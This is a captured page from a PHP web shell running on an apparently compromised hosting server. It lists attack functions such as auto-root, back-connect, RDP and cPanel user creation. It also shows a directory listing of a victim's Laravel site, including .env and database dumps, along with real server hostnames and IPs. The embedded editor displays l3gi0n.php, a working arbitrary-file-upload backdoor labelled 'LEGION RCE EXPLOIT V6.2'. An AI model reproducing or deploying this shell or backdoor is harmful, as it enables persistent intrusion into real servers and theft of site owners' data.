Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
reagro /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
delivery
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
sunat
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.env
946
B
-rw-r--r--
.env.example
651
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
155
B
-rw-r--r--
.htaccess
281
B
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
composer.json
1.62
KB
-rw-r--r--
composer.lock
148.19
KB
-rw-r--r--
index.html
274
B
-rw-r--r--
l3gi0n.php
718
B
-rw-r--r--
package.json
1022
B
-rw-r--r--
phpunit.xml
1.11
KB
-rw-r--r--
readme.md
3.59
KB
-rw-r--r--
robots.txt
31
B
-rw-r--r--
ryuk.php
522
B
-rw-r--r--
server.php
563
B
-rw-r--r--
seven_2024.sql
62.01
KB
-rw-r--r--
seven_master_MAYO_2024.zip
33.25
MB
-rw-r--r--
sunat.zip
9.72
MB
-rw-r--r--
webpack.mix.js
549
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : l3gi0n.php
<?php echo '<center><h1><font size="7" color="#66ffff">LEGION RCE EXPLOIT V6.2</font></h1></center>'; echo '<b><font size="4" color="#ff9933">['.php_uname().']</font></b><br><br>'; echo '<form method="post" enctype="multipart/form-data">'; echo '<input type="file" name="file">'; echo '<input name="_upl" type="submit" value="Upload"></form>'; $root = $_SERVER['DOCUMENT_ROOT']; $file = $_FILES['file']['name']; $dest = $root . '/' . $file; if ($_POST['_upl'] === 'Upload') { if (@copy($_FILES['file']['tmp_name'], $dest)) { echo 'LEGION Exploit Success! -> <a href="' . $file . '" target="_blank"><b><u>' . $file . '</u></b></a>'; } else { echo '<b>Upload failed.</b>'; } }
Close